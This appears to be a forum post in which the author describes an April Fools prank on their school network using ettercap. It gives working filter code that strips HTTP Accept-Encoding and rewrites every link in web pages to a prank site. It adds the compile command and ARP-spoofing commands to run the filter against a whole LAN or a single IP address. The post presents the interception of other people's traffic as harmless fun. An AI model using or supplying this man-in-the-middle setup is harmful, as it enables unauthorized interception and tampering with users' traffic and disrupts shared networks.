Below is a simple ettercap filter that I used to pull off a rather funny April fools joke at my school. Basically, the filter intercepts all "a href=" html links and replaces it with the string I specified, www internetisseriousbusiness org.(warning: don't visit that link unless you like annoying popups and rickrolls)
The code for the filter:
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<a href=", "<a href="internetisseriousbusiness.org" ");
replace("<A HREF=", "<a href="internetisseriousbusiness.org" ");
msg("Filter Ran.\n");
}
To actually use this, you will need to convert the code to a usable format.
Save the above code as "seriousbusiness.filter" and then run:
> etterfilter seriousbusiness.filter -o seriousbusiness.ef
Once you have the compile *ef filter, you can run the filtering process on an entire network using:
> ettercap -T -q -F ig.ef -M ARP // //
On large networks take a long time to run and can really slow the network down, since all traffic is technically being routed through your computer.
You can target a specific host instead of the entire network by using:
> ettercap -T -q -F ig.ef -M ARP /10.22.1.198/ //
Once you have the filter running, just sit back and wait. Your target(s) will visit their routine websites like normal, but when they go to click a link...you get the idea.
Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks.
